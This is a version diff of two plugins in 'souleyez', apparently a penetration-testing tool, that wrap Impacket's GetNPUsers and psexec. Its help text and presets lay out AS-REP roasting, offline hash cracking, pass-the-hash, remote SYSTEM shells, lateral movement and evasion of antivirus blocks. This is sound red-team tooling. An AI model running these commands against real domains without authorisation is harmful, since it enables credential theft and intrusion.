souleyez 2.43.29__py3-none-any.whl → 3.0.0__py3-none-any.whl

souleyez/plugins/impacket_getnpusers.py

@@ -26,11 +26,11 @@ HELP = {
         "- Use with username list for better results\n"
         "- Check for accounts with SPN and no pre-auth\n"
     ),
-    "usage": "souleyez jobs enqueue impacket-getnpusers <domain>/<username> --args \"-dc-ip <dc_ip>\"",
+    "usage": 'souleyez jobs enqueue impacket-getnpusers <domain>/<username> --args "-dc-ip <dc_ip>"',
     "examples": [
-        "souleyez jobs enqueue impacket-getnpusers CONTOSO.LOCAL/ --args \"-dc-ip 10.0.0.82 -usersfile users.txt\"",
-        "souleyez jobs enqueue impacket-getnpusers CONTOSO.LOCAL/ --args \"-dc-ip 10.0.0.82 -no-pass\"",
-        "souleyez jobs enqueue impacket-getnpusers CONTOSO.LOCAL/user --args \"-dc-ip 10.0.0.82 -format hashcat\"",
+        'souleyez jobs enqueue impacket-getnpusers CONTOSO.LOCAL/ --args "-dc-ip 10.0.0.82 -usersfile users.txt"',
+        'souleyez jobs enqueue impacket-getnpusers CONTOSO.LOCAL/ --args "-dc-ip 10.0.0.82 -no-pass"',
+        'souleyez jobs enqueue impacket-getnpusers CONTOSO.LOCAL/user --args "-dc-ip 10.0.0.82 -format hashcat"',
     ],
     "flags": [
         ["-dc-ip <ip>", "Domain Controller IP address"],
@@ -44,80 +44,108 @@ HELP = {
             {
                 "name": "Anonymous AS-REP Roast",
                 "args": ["-dc-ip", "<target>", "-no-pass", "-format", "hashcat"],
-                "desc": "Extract AS-REP hashes without authentication (anonymous)"
+                "desc": "Extract AS-REP hashes without authentication (anonymous)",
             },
             {
                 "name": "With Username List",
-                "args": ["-dc-ip", "<target>", "-usersfile", "users.txt", "-format", "hashcat", "-no-pass"],
-                "desc": "Test list of usernames for AS-REP roasting"
-            }
+                "args": [
+                    "-dc-ip",
+                    "<target>",
+                    "-usersfile",
+                    "users.txt",
+                    "-format",
+                    "hashcat",
+                    "-no-pass",
+                ],
+                "desc": "Test list of usernames for AS-REP roasting",
+            },
         ],
         "authenticated": [
             {
                 "name": "AS-REP Roast (Authenticated)",
                 "args": ["-dc-ip", "<target>", "-format", "hashcat"],
-                "desc": "Extract AS-REP hashes with valid domain account"
+                "desc": "Extract AS-REP hashes with valid domain account",
             },
             {
                 "name": "Request All Vulnerable Accounts",
                 "args": ["-dc-ip", "<target>", "-request", "-format", "hashcat"],
-                "desc": "Find and extract all AS-REP roastable accounts"
-            }
-        ]
+                "desc": "Find and extract all AS-REP roastable accounts",
+            },
+        ],
     },
-    "presets": []
+    "presets": [],
 }
 
 # Flatten presets
-for category_presets in HELP['preset_categories'].values():
-    HELP['presets'].extend(category_presets)
+for category_presets in HELP["preset_categories"].values():
+    HELP["presets"].extend(category_presets)
 
 HELP["help_sections"] = [
     {
         "title": "What is GetNPUsers (AS-REP Roasting)?",
         "color": "cyan",
         "content": [
-            {"title": "Overview", "desc": "GetNPUsers performs AS-REP Roasting to extract Kerberos hashes for accounts that don't require Kerberos pre-authentication, which can be cracked offline."},
-            {"title": "Use Cases", "desc": "Extract crackable hashes without credentials", "tips": [
-                "Find accounts with 'Do not require Kerberos preauthentication' set",
-                "Extract AS-REP hashes without valid credentials",
-                "Identify weak passwords in Active Directory",
-                "Get initial access foothold"
-            ]}
-        ]
+            {
+                "title": "Overview",
+                "desc": "GetNPUsers performs AS-REP Roasting to extract Kerberos hashes for accounts that don't require Kerberos pre-authentication, which can be cracked offline.",
+            },
+            {
+                "title": "Use Cases",
+                "desc": "Extract crackable hashes without credentials",
+                "tips": [
+                    "Find accounts with 'Do not require Kerberos preauthentication' set",
+                    "Extract AS-REP hashes without valid credentials",
+                    "Identify weak passwords in Active Directory",
+                    "Get initial access foothold",
+                ],
+            },
+        ],
     },
     {
         "title": "How to Use",
         "color": "green",
         "content": [
-            {"title": "Basic Workflow", "desc": "1. Run anonymously (-no-pass) with username list\n     2. Extract AS-REP hashes for vulnerable accounts\n     3. Crack hashes with hashcat mode 18200\n     4. Use cracked credentials for access"},
-            {"title": "Key Options", "desc": "Essential GetNPUsers parameters", "tips": [
-                "-no-pass: Anonymous enumeration",
-                "-usersfile: Test multiple usernames",
-                "-format hashcat: Output for hashcat cracking",
-                "-dc-ip: Domain Controller IP address"
-            ]}
-        ]
+            {
+                "title": "Basic Workflow",
+                "desc": "1. Run anonymously (-no-pass) with username list\n     2. Extract AS-REP hashes for vulnerable accounts\n     3. Crack hashes with hashcat mode 18200\n     4. Use cracked credentials for access",
+            },
+            {
+                "title": "Key Options",
+                "desc": "Essential GetNPUsers parameters",
+                "tips": [
+                    "-no-pass: Anonymous enumeration",
+                    "-usersfile: Test multiple usernames",
+                    "-format hashcat: Output for hashcat cracking",
+                    "-dc-ip: Domain Controller IP address",
+                ],
+            },
+        ],
     },
     {
         "title": "Tips & Best Practices",
         "color": "yellow",
         "content": [
-            ("Best Practices:", [
-                "Use -usersfile with common username lists",
-                "Output in hashcat format (-format hashcat)",
-                "Works without any authentication (anonymous)",
-                "Crack hashes with: hashcat -m 18200 hashes.txt wordlist.txt",
-                "Check for SPN accounts without pre-auth"
-            ]),
-            ("Common Issues:", [
-                "No hashes found: Pre-auth may be required for all accounts",
-                "DC unreachable: Verify -dc-ip is correct",
-                "Format errors: Use -format hashcat or john",
-                "Empty results: Try authenticated scan with valid credentials"
-            ])
-        ]
-    }
+            (
+                "Best Practices:",
+                [
+                    "Use -usersfile with common username lists",
+                    "Output in hashcat format (-format hashcat)",
+                    "Works without any authentication (anonymous)",
+                    "Crack hashes with: hashcat -m 18200 hashes.txt wordlist.txt",
+                    "Check for SPN accounts without pre-auth",
+                ],
+            ),
+            (
+                "Common Issues:",
+                [
+                    "No hashes found: Pre-auth may be required for all accounts",
+                    "DC unreachable: Verify -dc-ip is correct",
+                    "Format errors: Use -format hashcat or john",
+                    "Empty results: Try authenticated scan with valid credentials",
+                ],
+            ),
+        ],
+    },
 ]
 
 
@@ -127,23 +155,35 @@ class ImpacketGetNPUsersPlugin(PluginBase):
     category = "credential_access"
     HELP = HELP
 
-
-    def build_command(self, target: str, args: List[str] = None, label: str = "", log_path: str = None):
+    def build_command(
+        self, target: str, args: List[str] = None, label: str = "", log_path: str = None
+    ):
         """Build command for background execution with PID tracking."""
         args = args or []
-        
+
         # Replace <target> placeholder
         args = [arg.replace("<target>", target) for arg in args]
 
-        # Build command
-        cmd = ["impacket-GetNPUsers", target] + args
+        # Build command - GetNPUsers expects: domain/ -dc-ip <ip> [options]
+        # Check if first arg is a domain (contains / or looks like domain.tld)
+        cmd = ["impacket-GetNPUsers"]
+
+        # If args starts with domain/, use that as positional arg (not target IP)
+        if args and ("/" in args[0] or args[0].count(".") >= 1):
+            # First arg is the domain, use it as positional
+            cmd.append(args[0])
+            args = args[1:]
+        else:
+            # Target is the domain
+            cmd.append(target)
+
+        cmd.extend(args)
 
-        return {
-            'cmd': cmd,
-            'timeout': 1800
-        }
+        return {"cmd": cmd, "timeout": 1800}
 
-    def run(self, target: str, args: List[str] = None, label: str = "", log_path: str = None) -> int:
+    def run(
+        self, target: str, args: List[str] = None, label: str = "", log_path: str = None
+    ) -> int:
         """Execute impacket-GetNPUsers and write output to log_path."""
 
         args = args or []
@@ -151,18 +191,26 @@ class ImpacketGetNPUsersPlugin(PluginBase):
         # Replace <target> placeholder
         args = [arg.replace("<target>", target) for arg in args]
 
-        # Build command
-        cmd = ["impacket-getnpusers"]
+        # Build command - GetNPUsers expects: domain/ -dc-ip <ip> [options]
+        cmd = ["impacket-GetNPUsers"]
 
-        # Add target (domain/username or just domain/)
-        cmd.append(target)
+        # If args starts with domain/, use that as positional arg (not target IP)
+        if args and ("/" in args[0] or args[0].count(".") >= 1):
+            # First arg is the domain, use it as positional
+            cmd.append(args[0])
+            args = args[1:]
+        else:
+            # Target is the domain
+            cmd.append(target)
 
-        # Add args
+        # Add remaining args
         cmd.extend(args)
 
         if not log_path:
             try:
-                proc = subprocess.run(cmd, capture_output=True, timeout=120, check=False)
+                proc = subprocess.run(
+                    cmd, capture_output=True, timeout=120, check=False
+                )
                 return proc.returncode
             except Exception:
                 return 1
@@ -174,16 +222,14 @@ class ImpacketGetNPUsersPlugin(PluginBase):
                 fh.write(f"Target: {target}\n")
                 fh.write(f"Args: {args}\n")
                 fh.write(f"Label: {label}\n")
-                fh.write(f"Started: {time.strftime('%Y-%m-%d %H:%M:%S UTC', time.gmtime())}\n")
+                fh.write(
+                    f"Started: {time.strftime('%Y-%m-%d %H:%M:%S UTC', time.gmtime())}\n"
+                )
                 fh.write(f"Command: {' '.join(cmd)}\n\n")
 
             # Run GetNPUsers
             proc = subprocess.run(
-                cmd,
-                capture_output=True,
-                timeout=120,
-                check=False,
-                text=True
+                cmd, capture_output=True, timeout=120, check=False, text=True
             )
 
             # Write output
@@ -194,7 +240,9 @@ class ImpacketGetNPUsersPlugin(PluginBase):
                 if proc.stderr:
                     fh.write(f"\n\n# Error output:\n{proc.stderr}\n")
 
-                fh.write(f"\nCompleted: {time.strftime('%Y-%m-%d %H:%M:%S UTC', time.gmtime())}\n")
+                fh.write(
+                    f"\nCompleted: {time.strftime('%Y-%m-%d %H:%M:%S UTC', time.gmtime())}\n"
+                )
                 fh.write(f"Exit Code: {proc.returncode}\n")
 
             return proc.returncode

souleyez/plugins/impacket_psexec.py

@@ -26,11 +26,11 @@ HELP = {
         "- Works even if PowerShell is disabled\n"
         "- Can use pass-the-hash with -hashes\n"
     ),
-    "usage": "souleyez jobs enqueue impacket-psexec <target> --args \"DOMAIN/user:pass@host\"",
+    "usage": 'souleyez jobs enqueue impacket-psexec <target> --args "DOMAIN/user:pass@host"',
     "examples": [
-        "souleyez jobs enqueue impacket-psexec 10.0.0.82 --args \"Administrator:Password123@10.0.0.82\"",
-        "souleyez jobs enqueue impacket-psexec 10.0.0.82 --args \"CONTOSO/Administrator@10.0.0.82 -hashes :8846f7eaee8fb117ad06bdd830b7586c\"",
-        "souleyez jobs enqueue impacket-psexec 10.0.0.82 --args \"Administrator:Password123@10.0.0.82 whoami\"",
+        'souleyez jobs enqueue impacket-psexec 10.0.0.82 --args "Administrator:Password123@10.0.0.82"',
+        'souleyez jobs enqueue impacket-psexec 10.0.0.82 --args "CONTOSO/Administrator@10.0.0.82 -hashes :8846f7eaee8fb117ad06bdd830b7586c"',
+        'souleyez jobs enqueue impacket-psexec 10.0.0.82 --args "Administrator:Password123@10.0.0.82 whoami"',
     ],
     "flags": [
         ["-hashes <LM:NT>", "Pass-the-hash authentication"],
@@ -44,90 +44,110 @@ HELP = {
             {
                 "name": "Interactive Shell",
                 "args": [],
-                "desc": "Get interactive SYSTEM shell (default behavior)"
+                "desc": "Get interactive SYSTEM shell (default behavior)",
             },
             {
                 "name": "Execute Single Command",
                 "args": ["whoami"],
-                "desc": "Execute single command and exit (replace 'whoami' with your command)"
+                "desc": "Execute single command and exit (replace 'whoami' with your command)",
             },
             {
                 "name": "Execute and Save Output",
                 "args": ["cmd.exe", "/c", "dir C:\\ > C:\\output.txt"],
-                "desc": "Run command and save output to file"
-            }
+                "desc": "Run command and save output to file",
+            },
         ],
         "authentication": [
             {
                 "name": "Pass-the-Hash (NTLM)",
                 "args": ["-hashes", ":<ntlm_hash>"],
-                "desc": "Authenticate with NTLM hash instead of password"
+                "desc": "Authenticate with NTLM hash instead of password",
             },
             {
                 "name": "Pass-the-Hash + Execute Command",
                 "args": ["-hashes", ":<ntlm_hash>", "whoami"],
-                "desc": "Use hash authentication and run command"
+                "desc": "Use hash authentication and run command",
             },
             {
                 "name": "Kerberos Authentication",
                 "args": ["-k", "-no-pass"],
-                "desc": "Use Kerberos ticket for authentication"
-            }
-        ]
+                "desc": "Use Kerberos ticket for authentication",
+            },
+        ],
     },
-    "presets": []
+    "presets": [],
 }
 
 # Flatten presets
-for category_presets in HELP['preset_categories'].values():
-    HELP['presets'].extend(category_presets)
+for category_presets in HELP["preset_categories"].values():
+    HELP["presets"].extend(category_presets)
 
 HELP["help_sections"] = [
     {
         "title": "What is psexec?",
         "color": "cyan",
         "content": [
-            {"title": "Overview", "desc": "psexec provides remote command execution on Windows systems using SMB and named pipes, similar to Sysinternals PsExec, executing commands with SYSTEM privileges."},
-            {"title": "Use Cases", "desc": "Remote command execution and lateral movement", "tips": [
-                "Execute commands with SYSTEM privileges",
-                "Get interactive shells on Windows hosts",
-                "Run post-exploitation scripts remotely",
-                "Pivot through compromised systems"
-            ]}
-        ]
+            {
+                "title": "Overview",
+                "desc": "psexec provides remote command execution on Windows systems using SMB and named pipes, similar to Sysinternals PsExec, executing commands with SYSTEM privileges.",
+            },
+            {
+                "title": "Use Cases",
+                "desc": "Remote command execution and lateral movement",
+                "tips": [
+                    "Execute commands with SYSTEM privileges",
+                    "Get interactive shells on Windows hosts",
+                    "Run post-exploitation scripts remotely",
+                    "Pivot through compromised systems",
+                ],
+            },
+        ],
     },
     {
         "title": "How to Use",
         "color": "green",
         "content": [
-            {"title": "Basic Workflow", "desc": "1. Obtain admin credentials or hashes\n     2. Connect to target with psexec\n     3. Execute commands or get interactive shell\n     4. Run post-exploitation tasks"},
-            {"title": "Key Options", "desc": "Essential psexec parameters", "tips": [
-                "Basic: psexec user:pass@host",
-                "Pass-the-hash: psexec -hashes :ntlm_hash user@host",
-                "Execute command: psexec user:pass@host whoami",
-                "Interactive shell: psexec user:pass@host (default)"
-            ]}
-        ]
+            {
+                "title": "Basic Workflow",
+                "desc": "1. Obtain admin credentials or hashes\n     2. Connect to target with psexec\n     3. Execute commands or get interactive shell\n     4. Run post-exploitation tasks",
+            },
+            {
+                "title": "Key Options",
+                "desc": "Essential psexec parameters",
+                "tips": [
+                    "Basic: psexec user:pass@host",
+                    "Pass-the-hash: psexec -hashes :ntlm_hash user@host",
+                    "Execute command: psexec user:pass@host whoami",
+                    "Interactive shell: psexec user:pass@host (default)",
+                ],
+            },
+        ],
     },
     {
         "title": "Tips & Best Practices",
         "color": "yellow",
         "content": [
-            ("Best Practices:", [
-                "Requires admin credentials or hashes",
-                "Less stealthy (creates service on target)",
-                "Works even if PowerShell is disabled",
-                "Can use pass-the-hash with -hashes",
-                "SYSTEM-level access by default"
-            ]),
-            ("Common Issues:", [
-                "Access denied: Verify admin credentials",
-                "Service creation failed: Check admin rights",
-                "Connection timeout: Verify SMB (445) is open",
-                "Antivirus blocks: Use alternative exec methods (wmiexec, smbexec)"
-            ])
-        ]
-    }
+            (
+                "Best Practices:",
+                [
+                    "Requires admin credentials or hashes",
+                    "Less stealthy (creates service on target)",
+                    "Works even if PowerShell is disabled",
+                    "Can use pass-the-hash with -hashes",
+                    "SYSTEM-level access by default",
+                ],
+            ),
+            (
+                "Common Issues:",
+                [
+                    "Access denied: Verify admin credentials",
+                    "Service creation failed: Check admin rights",
+                    "Connection timeout: Verify SMB (445) is open",
+                    "Antivirus blocks: Use alternative exec methods (wmiexec, smbexec)",
+                ],
+            ),
+        ],
+    },
 ]
 
 
@@ -137,23 +157,23 @@ class ImpacketPsexecPlugin(PluginBase):
     category = "lateral_movement"
     HELP = HELP
 
-
-    def build_command(self, target: str, args: List[str] = None, label: str = "", log_path: str = None):
+    def build_command(
+        self, target: str, args: List[str] = None, label: str = "", log_path: str = None
+    ):
         """Build command for background execution with PID tracking."""
         args = args or []
-        
+
         # Replace <target> placeholder
         args = [arg.replace("<target>", target) for arg in args]
-        
+
         # Build command (args should include credentials)
         cmd = ["impacket-psexec"] + args
-        
-        return {
-            'cmd': cmd,
-            'timeout': 1800
-        }
 
-    def run(self, target: str, args: List[str] = None, label: str = "", log_path: str = None) -> int:
+        return {"cmd": cmd, "timeout": 1800}
+
+    def run(
+        self, target: str, args: List[str] = None, label: str = "", log_path: str = None
+    ) -> int:
         """Execute impacket-psexec and write output to log_path."""
 
         args = args or []
@@ -181,17 +201,15 @@ class ImpacketPsexecPlugin(PluginBase):
                 fh.write(f"Target: {target}\n")
                 fh.write(f"Args: {args}\n")
                 fh.write(f"Label: {label}\n")
-                fh.write(f"Started: {time.strftime('%Y-%m-%d %H:%M:%S UTC', time.gmtime())}\n")
+                fh.write(
+                    f"Started: {time.strftime('%Y-%m-%d %H:%M:%S UTC', time.gmtime())}\n"
+                )
                 fh.write(f"Command: {' '.join(cmd)}\n\n")
 
             # Run psexec (non-interactive)
             # Note: For interactive shells, this would need special handling
             proc = subprocess.run(
-                cmd,
-                capture_output=True,
-                timeout=60,
-                check=False,
-                text=True
+                cmd, capture_output=True, timeout=60, check=False, text=True
             )
 
             # Write output
@@ -202,7 +220,9 @@ class ImpacketPsexecPlugin(PluginBase):
                 if proc.stderr:
                     fh.write(f"\n\n# Error output:\n{proc.stderr}\n")
 
-                fh.write(f"\nCompleted: {time.strftime('%Y-%m-%d %H:%M:%S UTC', time.gmtime())}\n")
+                fh.write(
+                    f"\nCompleted: {time.strftime('%Y-%m-%d %H:%M:%S UTC', time.gmtime())}\n"
+                )
                 fh.write(f"Exit Code: {proc.returncode}\n")
 
             return proc.returncode